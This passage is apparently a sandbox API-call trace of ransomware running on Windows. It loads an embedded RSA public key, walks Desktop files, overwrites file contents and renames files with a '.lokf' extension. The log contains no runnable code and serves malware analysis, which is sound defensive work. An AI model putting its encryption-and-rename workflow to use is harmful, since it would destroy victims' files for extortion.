KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.610] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.610] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.610] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.610] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.611] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.611] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.611] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.611] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.611] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.611] GetLastError () returned 0x0 [0058.611] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.611] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.611] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.611] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.611] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.611] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.611] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.611] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.611] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x7a0) returned 0x32947b0 [0058.612] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0058.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0058.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0058.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0058.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298f50 [0058.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6af08 [0058.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298f98 [0058.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6af20 [0058.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6af50 [0058.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6af68 [0058.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0058.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0058.612] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0058.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af50 | out: hHeap=0x660000) returned 1 [0058.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af68 | out: hHeap=0x660000) returned 1 [0058.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0058.612] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0058.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0058.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6af68 [0058.612] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0058.613] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x79e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.613] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.613] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.613] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.613] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.613] CloseHandle (hObject=0x5cc) returned 1 [0058.613] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I9YVy1.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i9yvy1.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\I9YVy1.mp3.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\i9yvy1.mp3.lokf")) returned 1 [0058.614] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.614] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.614] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.615] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3289860 | out: hHeap=0x660000) returned 1 [0058.615] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x150300c0, ftCreationTime.dwHighDateTime=0x1d4c8d3, ftLastAccessTime.dwLowDateTime=0xd492d060, ftLastAccessTime.dwHighDateTime=0x1d4d2d7, ftLastWriteTime.dwLowDateTime=0xd492d060, ftLastWriteTime.dwHighDateTime=0x1d4d2d7, nFileSizeHigh=0x0, nFileSizeLow=0xaf64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IiDoDihC33qoyQYC.avi", cAlternateFileName="IIDODI~1.AVI")) returned 1 [0058.615] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IiDoDihC33qoyQYC.avi") returned=".avi" [0058.615] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IiDoDihC33qoyQYC.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\iidodihc33qoyqyc.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.615] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=44900) returned 1 [0058.615] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.618] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xaf3e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.618] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.618] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xaf64, lpOverlapped=0x0) returned 1 [0058.618] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.619] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.619] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.619] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b89c8) returned 1 [0058.619] CryptCreateHash (in: hProv=0x6b89c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.619] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.619] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.619] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.619] GetLastError () returned 0x0 [0058.619] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.619] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0058.619] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.620] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.620] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.620] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.620] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.620] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.620] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.620] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af68 | out: hHeap=0x660000) returned 1 [0058.620] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af80 | out: hHeap=0x660000) returned 1 [0058.620] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.620] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0058.620] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.620] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.620] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0058.620] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6af80 [0058.620] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0058.620] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6af68 [0058.620] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0058.620] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0058.620] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.620] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0058.620] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0058.620] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0058.620] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0058.620] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0058.620] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.620] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af80 | out: hHeap=0x660000) returned 1 [0058.621] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.621] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af68 | out: hHeap=0x660000) returned 1 [0058.621] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0058.621] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.621] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.621] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.621] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0058.621] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0058.621] GetCurrentThreadId () returned 0x9e0 [0058.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326a688 [0058.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x6c3350 [0058.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0058.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0058.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3234418 [0058.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.621] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.621] GetCurrentThreadId () returned 0x9e0 [0058.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.621] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0058.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.621] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.621] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.621] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0058.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3292fe8 [0058.621] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0058.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3282810 [0058.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.621] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.621] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0058.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0058.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0058.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6af68 [0058.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0058.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0058.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0058.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0058.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6af80 [0058.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0058.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0058.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0058.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6af50 [0058.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0058.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0058.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f70 [0058.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0058.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6af98 [0058.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0058.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0058.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0058.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0058.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0058.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af68 | out: hHeap=0x660000) returned 1 [0058.622] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6af68 [0058.622] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0058.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0058.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0058.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3296fa8 [0058.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0058.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6af68 | out: hHeap=0x660000) returned 1 [0058.623] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32949c8 [0058.623] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: 